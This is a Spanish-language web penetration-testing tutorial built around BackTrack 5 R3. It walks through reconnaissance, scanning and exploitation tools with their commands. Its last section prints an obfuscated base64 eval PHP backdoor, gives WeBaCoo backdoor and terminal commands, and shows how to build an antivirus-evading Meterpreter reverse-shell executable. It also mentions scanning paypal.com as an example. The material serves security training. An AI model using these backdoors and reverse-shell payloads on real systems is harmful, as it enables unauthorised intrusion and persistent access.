Penetration Testing PDF

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 23

2012

[In]Seguridad Informtica Caleb Bucker


Pen-Tester Ethical Hacker Security Researcher http://calebbucker.blogspot.com http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker [email protected]

[PENETRATION TESTING]
[Anlisis Web Evaluacin de Vulnerabilidades Explotacin]
[In]Seguridad Informtica http://calebbucker.blogspot.com Pgina 0

NDICE
INTRODUCCIN MTODOS DE ANLISIS DE APLICACIONES WEB
Network Mapping Information Gathering CMS Identification IDS/IPS Detection Open Source Analysis Web Crawlers Vulnerability Assessment and Exploitation Maintaining Access Nmap Netifera TheHarvester

NETWORK MAPPING

INFORMATION GATHERING Maltego CMS IDENTIFICATION


BlindElephant CMS-Explorer WhatWeb Waffit GHDB (Google Hacking DataBase) Xssed WebShag DirBuster JoomScan SqlMap Fimap Shodan W3af Uniscan Nikto Weevely WeBaCoo MsfPayload

IDS/IPS DETECTION OPEN SOURCE ANALYSIS

WEB CRAWLERS

VULNERABILITY ASSESSMENT AND EXPLOITATION

MAINTAINING ACCESS

CONCLUSIN

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 1

INTRODUCCIN

Hoy en da como muchos de nosotros (Pen-testers) tenemos conocimiento que en estos tiempos el Anlisis de Aplicaciones Web juega un papel muy importante al hacer una Evaluacin de la Seguridad y/o Penetration Testing, ya que esta nos brinda la informacin adecuada acerca de la Aplicacin Web, como por ejemplo el tipo de Plugin que utiliza, tipos de CMS ya sea Joomla WordPress u otros. Esto nos ayudara mucho a determinar que Exploit debemos usar, o ver la manera exacta de explotar las vulnerabilidades que se pueden presentar al momento de realizar las pruebas de penetracin. Los anlisis de Penetration Testing sirven tambin para determinar el nivel de seguridad en: un equipo, en una red de equipos LAN (Local rea Network) o WLAN (Wireless local rea Network), aplicaciones Web entre otros, por medio de ataques informticos simulados idnticos a los que realizara un Cracker o Black Hat Hacker pero sin poner en riesgo la informacin o la disponibilidad de los servicios, esto se hace con el fin de encontrar las posibles amenazas en los sistemas IT antes de que las descubra un atacante (externo o interno). Este proceso tambin es conocido como Hacking tico (Ethical Hacking). Para llevar a cabo este procedimiento de Penetration Testing, se utilizara BackTrack 5 R3, una distro de Linux basada en Ubuntu hecha perfectamente para llevar a cabo estas pruebas, ya que viene con un conjunto de herramientas muy importantes que servir de mucho para obtener toda la informacin necesaria acerca de las Aplicaciones Web, entre otros.

BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 2

MTODOS DE ANLISIS DE APLICACIONES WEB

NETWORK MAPPING:
Network Mapping es el estudio de la conectividad fsica de redes. Internet Mapping es el estudio de la conectividad fsica de la Internet. Network Mapping a menudo se trata de determinar los servidores y sistemas operativos que se ejecutan en las redes. La ley y la tica de escaneo de puertos son complejas. Un anlisis de la red puede ser detectada por los seres humanos o sistemas automatizados, y se trata como un acto malicioso. En la suite de BackTrack se incluye NMAP, una herramienta que ya todos conocemos por su potencia y eficacia a la hora que realiza su trabajo, la cual nos sirve mucho para poder llevar a cabo este mtodo tan importante en una Auditoria Web.

NMAP:
Nmap (mapeador de redes) es una herramienta de cdigo abierto para exploracin de red y auditora de seguridad. Nmap utiliza paquetes IP "crudos" (raw, N. del T.) en formas originales para determinar qu equipos se encuentran disponibles en una red, qu servicios (nombre y versin de la aplicacin) ofrecen, qu sistemas operativos (y sus versiones) ejecutan, qu tipo de filtros de paquetes o cortafuegos se estn utilizando as como docenas de otras caractersticas. Uso: nmap www.sitio-web.com nmap 192.168.1.1

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 3

NETIFERA:
Netifera es un escner de red capaz de analizar pasiva (anlisis de un archivo pcap, vive oliendo de red), as como activos de anlisis (anlisis de puerto de entidad). Permite identificar los hosts de la red. Este proyecto ofrece muchas ventajas para los desarrolladores de seguridad y los investigadores que desean implementar nuevas herramientas, as como la comunidad de usuarios de estas herramientas. Esta herramienta esta incluida en el BackTrack y se ubica en la siguiente direccin: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts - Netifera El uso es muy fcil, solo tenemos que colocar la direccin web donde dice: Type Adreesss... presionamos enter y nos saldr el sitio web con los target's e IP's a la cual auditaremos. En este caso he colocado el sitio web: www.paypal.com en la cual he realizado Reverse lookup, TCP Connect Scan, UDP Scan, Crawler, Lookup NS, Brute Force Host Name:

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 4

INFORMATION GATHERING
La primera fase de evaluacin de la seguridad se centra en la recopilacin de informacin tanto como sea posible acerca de una aplicacin web. La recopilacin de informacin es el paso ms crtico de una prueba de seguridad de aplicaciones web. Esta tarea puede llevarse a cabo de muchas maneras diferentes, mediante el uso de herramientas pblicas (motores de bsqueda), escner, envo de simples peticiones HTTP o solicitudes especialmente diseadas, es posible forzar a la aplicacin a filtrar informacin, por ejemplo, la revelacin de mensajes de errores o las versiones y las tecnologas utilizadas. Hay bsicamente dos tipos de recoleccin de informacin: activa y pasiva. Recopilacin de informacin pasiva es que los atacantes no se comunicarn con el objetivo directamente y estarn tratando de reunir informacin que est disponible en la Internet, mientras que en la recoleccin activa de informacin, el atacante estar en contacto directo con el objetivo y estar tratando de reunir informacin.

THEHARVESTER:
TheHarvester es una herramienta para recopilar cuentas de correo electrnico, nombres de usuario y nombres de host o subdominios de diferentes fuentes pblicas como motores de bsqueda y los servidores de claves PGP. Uso:
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 5

MALTEGO:
Maltego, es una herramienta que se basa en la informacin y aplicacin forense y muestra cmo la informacin est conectado el uno al otro. Con Maltego, podemos encontrar las relaciones que las personas mayormente usan en la actualidad, incluyendo su perfil social (Facebook Twitter), amigos mutuos, las empresas que se relacionan con la informacin recopilada, y sitios web. Si queremos recoger informacin relacionada con cualquier infraestructura, podemos reunir relacin entre los dominios y nombres de DNS. Ubicacin: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis Maltego ARQUITECTURA DE MALTEGO

EJEMPLO

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 6

CMS IDENTIFICATION
BLINDELEPHANT:
BlindElephant es una herramienta basada en python que se utiliza para realizar Fingerprinting en Aplicaciones Web. La herramienta es rpida, tiene poco ancho de banda y esta altamente automatizado. Uso:
/pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms

CMS-EXPLORER:
Sirve para realizar Fingerprinting en Aplicaciones Web, como tambin puede ser usado para identificar el tipo de CMS utilizado, por tanto, se realiza el ataque de acuerdo con la informacin obtenida. Uso:
/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 7

WHATWEB:
Es otra herramienta que se utiliza para identificar el tipo de sistemas de gestin de contenidos (CMS), plataforma de blogs, estadsticas, bibliotecas Javascript y servidores utilizados. Cuenta con 900 Plugins para fines de anlisis web. Uso:
/pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 8

IDS/IPS DETECTION
Durante la realizacin de un VA/PT en un dominio, existe la posibilidad de que los servicios IDS-IPS estn instalados, esto a veces puede detener varios tipos de ataques que se realizan en el dominio. Una gran cantidad de WAF (Web Application Firewall) se venden a las Empresas como una tcnica valida para la mitigacin de vulnerabilidades en las Aplicaciones Web. Por suerte, WAF es fcil de detectar, porque la mayora de estos utilizan la firma basada en mtodos de deteccin, por lo tanto, el atacante puede tratar de codificar los parmetros de ataque y tratar de bypassear el WAF. En la suite de BackTrack se incluye una herramienta til para la deteccin de los IDS-IPS, la cual es Waffit.

WAFFIT:
Es una herramienta que detecta los posibles Firewall que pueda tener un servidor web, esto sirve de mucho, ya que detectar el servidor de seguridad detrs del dominio es un paso muy importante en el proceso de Pruebas de Penetracin. Uso:
/pentest/web/waffit# ./wafw00f.py http://sitio-web.com/

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 9

OPEN SOURCE ANALYSIS


Open-Source Analysis se realiza utilizando herramientas como GHDB, revhosts y Xssed. El GHDB (Google Hack Data Base) y Xssed estn vinculadas a sitios webs, mientras que revhosts es una herramienta de consola.

GHDB:
Google Hacking Database, el equipo de exploit-db mantiene una base de datos para Google Dorks que pueden ayudar mucho a los Pen-testers en la recopilacin de informacin. Podemos usar las dork's para encontrar ciertos tipos de servidores vulnerables u otra informacin. Por ejemplo, un dork Google como "Microsoft-IIS/6.0" intitle:index.of " se puede utilizar para detectar los servidores que se ejecutan en Microsoft IIS 6.0.

XSSED:
www.xssed.com un sitio web que contiene una lista de sitios web vulnerables a Cross Site Scripting (XSS), presentada por varios autores. Se puede abrir desde: Applications - Backtrack - Information Gathering - Web Application Analysis Open Source Analysis - Xssed.

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 10

WEB CRAWLERS
En esta ultima categora de Anlisis Web, se utilizan los famosos Crawlers, esto ayudara mucho a enumerar los archivos y carpetas "escondidos" dentro de un servidor web. La suite de BackTrack cuenta con muchas herramientas para llevar a cabo este tipo de anlisis como son el Dirb, Golismero, SqlScan, Deblaze y WebShag.

WEBSHAG:
Webshag es una herramienta programado en Python, que rene las funcionalidades tiles para la Auditora de los Servidores Web, como el rastreo web, escaneo de URL o archivo de fuzzing. Webshag se puede utilizar para analizar un servidor web en HTTP o HTTPS, a travs de un proxy HTTP y el uso de la autenticacin (bsica y Digest). Adems de que propone innovadoras funcionalidades de evasin de IDS, destinadas a que la correlacin entre la solicitud ms complicado (por ejemplo, utilizar una muestra aleatoria diferente por cada peticin HTTP del servidor proxy). Se ubica en: Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui.

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 11

DIRBUSTER:
DirBuster es una aplicacin en Java diseado para realizar Brute Force en los Directorios y Archivos en servidores web/aplicacin. A menudo es el caso ahora de lo que parece un servidor web en un estado de la instalacin por defecto no es en realidad, y tiene pginas y aplicaciones ocultas en su interior, entonces DirBuster intenta encontrar estos. DirBuster viene un total de 9 listas diferentes, esto hace DirBuster extremadamente eficaz en la bsqueda de los archivos y directorios ocultos. Y si eso no fuera suficiente DirBuster tambin tiene la opcin de realizar un puro Brute Force. Se puede encontrar en la siguiente ubicacin: Applications - BackTrack - Vulnerabylity Assessment Web Application Assessment - Web Application Fuzzers DirBuster

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 12

VULNERABILITY ASSESSMENT AND EXPLOITATION


La etapa de evaluacin de la vulnerabilidad es donde se puede explorar nuestro objetivo en busca de errores, pero antes de hacer una evaluacin de la vulnerabilidad, la recopilacin de informacin sobre el objetivo es mucho ms til. La fase de recopilacin de informacin sigue siendo el paso clave antes de realizar nuevos ataques, simplemente porque hace el trabajo ms fcil, por ejemplo, en la primera etapa: en el uso de escners para identificar el CMS como BlindElephant, se escaneo y se encontr la versin de la aplicacin instalada. Ahora, en la etapa de evaluacin de la vulnerabilidad, se pueden utilizar muchas herramientas (escaners) que ayudaran mucho a encontrar respectivas vulnerabilidades en un servidor web especfico.

JOOMSCAN:
Es una herramienta basada en Perl que se utiliza para identificar las vulnerabilidades mas conocidas como Sql Injection, XSS u otras, en los servidores web basados en la plataforma Joomla. Uso:
/pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com

Permite detectar la versin de Joomla! que se est ejecutando. Escanea y localiza vulnerabilidades conocidas en Joomla! y sus extensiones. Presenta informes en formato texto o HTML. Permite su actualizacin inmediata a travs de un escner o svn. Detecta vulnerabilidades de tipo: SQL injection, LFI, RFI, XSS entre otros.

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 13

SQLMAP:
Es una herramienta que ayuda a automatizar el proceso de detectar y explotar las vulnerabilidades de inyeccin SQL permitiendo tener acceso total a la base de datos de los servidores web. Uso:
/pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs

FIMAP:
Es una pequea herramienta programada en python que puede encontrar, preparar, auditar y explotar automticamente los errores de Remote File Inclusion en aplicaciones web. Esta actualmente bajo desarrollo, pero es utilizable. El objetivo de Fimap es mejorar la calidad y la seguridad de su sitio web. Uso:
/pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 14

SHODAN:
Esto es otra herramienta de evaluacin web, una utilidad particular para los pentesters. Puede ser utilizado para recoger una serie de informacin inteligente sobre los dispositivos que estn conectados a la Internet. Podemos, por ejemplo, buscar para ver si todos los dispositivos de red, como routers, VoIP, impresoras, cmaras, etc, estn en su lugar. Para buscar si algn servicio se est ejecutando en el dominio, la sintaxis sera: hostname:target.com port:80,21,22

Si deseamos simplemente conocer los resultados sobre el nombre de host, simplemente, la sintaxis seria: hostname:target.com

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 15

W3AF:
Es una herramienta de Auditoria de Seguridad para Aplicaciones Webs, se encuentra bsicamente dividido en varios mdulos como el Ataque, Auditoria, Exploit, Descubrimiento, Evasion y Brute Force, lo cual se pueden usar todos en consecuencia. Estos mdulos en W3af vienen con varios mdulos secundarios como, por ejemplo, podemos seleccionar la opcin XSS en el mdulo de Auditoria suponiendo que es necesaria para realizar una determinada Auditoria. Se ubica en: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af

Una vez completado el anlisis, w3af muestra informacin detallada acerca de las vulnerabilidades encontradas en el sitio web especificado, que se puede comprometer en consecuencia de una explotacin adicional.

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 16

UNISCAN:
Es un escner de Vulnerabilidades Web, dirigido a la seguridad informtica, cuyo objetivo es la bsqueda de vulnerabilidades en los sistemas web. Est licenciado bajo GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan est desarrollado en Perl, tiene un fcil manejo de expresiones regulares y tambin es multithreaded. Caractersticas: Identificacin de las pginas del sistema a travs de un rastreador web. Prueba de pginas encontradas a travs del mtodo GET. Prueba de las formas encontradas por el mtodo POST. Soporte para peticiones SSL (HTTPS). Soporta Proxy. Generar lista de sitios a travs de Google. Generar lista de sitios con Bing. Cliente GUI escrito en perl usando tk.

Se puede descargar desde el siguiente link: Download Uniscan Web Vulnerability Scanner v6.2 Uso:
./uniscan.pl -u http://www.sitio-web.com/ -qweds

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 17

NIKTO:
Es un escner de servidor web que realiza pruebas completas contra los servidores web para varios artculos, incluyendo ms de 6500 archivos/CGIs potencialmente peligrosos, los controles de versiones no actualizadas de ms de 1250 servidores, y los problemas especficos de la versin de ms de 270 servidores. Tambin comprueba los elementos de configuracin del servidor, tales como la presencia de mltiples archivos de ndice y opciones de servidor HTTP. Nikto es un proyecto robusto que lleva varios aos en desarrollo y se encuentra en constante evolucin. Unas de las caractersticas ms interesantes de esta herramienta son la posibilidad de generar reportes en distintos formatos, la integracin con LibWhisker (Anti-IDS), integracin con Metasploit, entre otras. Se ubica en: Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Uso:
/pentest/web/nikto# ./nikto.pl -host www.sitio-web.com

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 18

MAITAINING ACCESS
Una vez que se tiene acceso a la pgina web (objetivo), tenemos que mantener el acceso para su uso futuro, porque no queremos estar empezando desde cero una y otra vez. Con el fin de evitar esto, podemos cargar las shell's web o puertas traseras a la pgina web. La codificacin de la puerta trasera tambin es importante, ya que no debe crear "ruido" una vez cargado en el servidor. Si es as, entonces los administradores pueden fcilmente detectar y eliminar las puertas traseras. En la suite de BackTrack 5 R3 se incorporan buenas herramientas para llevar a cabo este proceso, las cuales son los siguientes:

WEEVELY:
Es una herramienta esencial para la explotacin posterior de aplicaciones web, y se puede utilizar como puerta trasera o como una shell web para gestionar las cuentas web. Weevely busca funciones como system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()) utilizando las funciones activadas en una servidor remoto. El cdigo siguiente es un ejemplo del cdigo de la puerta trasera creada por Weevely. ------------------------------------------------------------------------------------------------------------------eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=')); -------------------------------------------------------------------------------------------------------------------

Se ubica en: Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Uso:
/pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php

/pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 19

WEBACOO:
WeBaCoo (Web Backdoor Cookie) es un backdoor que proporciona una terminal de conexin a travs de HTTP entre el cliente y el servidor web. Se trata de una herramienta de explotacin para mantener el acceso a un servidor web (hacked). Fue diseado para operar bajo el radar de la moderna puesta al anticuado AV, NIDS, IPS, Network Firewalls y Application Firewalls , lo que demuestra un mecanismo de sigilo para ejecutar comandos en el servidor comprometido. El archivo ofuscado realiza comunicacin mediante HTTP header's Cookie validando solicitudes y respuestas HTTP del servidor web. WeBaCoo ofrece un modo de generar el cdigo para crear el PHP backdoor, usando payloads predefinidos. Tambin ofrece la "terminal" el modo en que el usuario puede establecer una remota conexin con el servidor y ejecutar comandos con privilegios deseados del servicio web. La descarga esta disponible desde Github: https://github.com/anestisb/WeBaCoo Opciones:
1) Crear backdoor ofuscado 'backdoor.php' con la configuracin predeterminada: ./webacoo.pl -g -o backdoor.php 2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito": ./webacoo.pl -g -o raw-backdoor.php -f 4 -r 3) Establecer "terminal" conexin con el host remoto usando la configuracin por defecto: ./webacoo.pl -t -u http://127.0.0.1/backdoor.php 4) Establecer "terminal" conexin con el host remoto al configurar algunos argumentos: ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT" 5) Establecer "terminal" conexin con el host remoto a travs de proxy HTTP: ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080 6) Establecer "terminal" conexin con el host remoto a travs de HTTP proxy con autenticacin bsica: ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128 7) Establecer "terminal" conexin con el host remoto a travs de Tor y registrar la actividad: ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 20

MSFPAYLOAD:
Metasploit se puede utilizar para crear puertas traseras que luego pueden ser utilizados para mantener el acceso en el servidor web. Esto se puede hacer con la ayuda de Msfpayload. Los pasos para crear puerta trasera en Msfpayload son como sigue: Tenemos que seleccionar el Payload que vamos a utilizar para obtener un shell Meterpreter generado a travs de una conexin TCP inverso. El comando sera:
msfpayload windows/meterpreter/reverse_tcp

Este Payload tiene dos parmetros: LHOST (nuestra IP) y el LPORT para seleccionar el puerto que vamos a utilizar. La "R" se utiliza para dar al archivo de salida en formato de datos RAW para que podamos codificar posteriormente.
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

Este comando crear el Payload, pero tiene que ser codificado con el fin de evitar la deteccin de los antivirus, para tal caso se puede hacer usando la opcin msfencode, para hacer esto, necesitamos usar barra vertical ("|")
windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode e x86/shikata_ga_nai t exe >> bucker.exe

-e se usa para especificar el tipo de codificacin necesario, en este caso estoy usando la codificacin shikata_ga_nai y -t para el tipo de extensin del archivo (exe). Por ejemplo, si deseamos ver la lista de los codificadores disponibles en MSF, usamos el siguiente comando: msfpayload windows/meterpreter/reverse_tcp -l

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 21

CONCLUSIN
Estos son slo unos pocos mtodos que se pueden seguir para realizar la explotacin de las vulnerabilidades en una aplicacin web. Una vez que tengamos la informacin acerca de nuestro objetivo, tratar de realizar una evaluacin de la vulnerabilidad con el fin de obtener informacin sobre los exploits que se pueden utilizar. Una vez hecho esto, explotar las vulnerabilidades y si es necesario, cargar un backdoor, pero antes de eso, se debe codificar el backdoor con el fin de evitar la deteccin. Espero que esto te ayude a encontrar la vulnerabilidad, la explotacin y la forma de mantener el acceso a tu objetivo. Un saludo. Referencias:
http://en.wikipedia.org/wiki/Penetration_test http://www.giac.org/certification/web-application-penetration-tester-gwapt http://www.offensive-security.com/information-security-training/penetration-testing-withbacktrack/ https://www.owasp.org/index.php/Web_Application_Penetration_Testing

[In]Seguridad Informtica http://calebbucker.blogspot.com

Pgina 22

También podría gustarte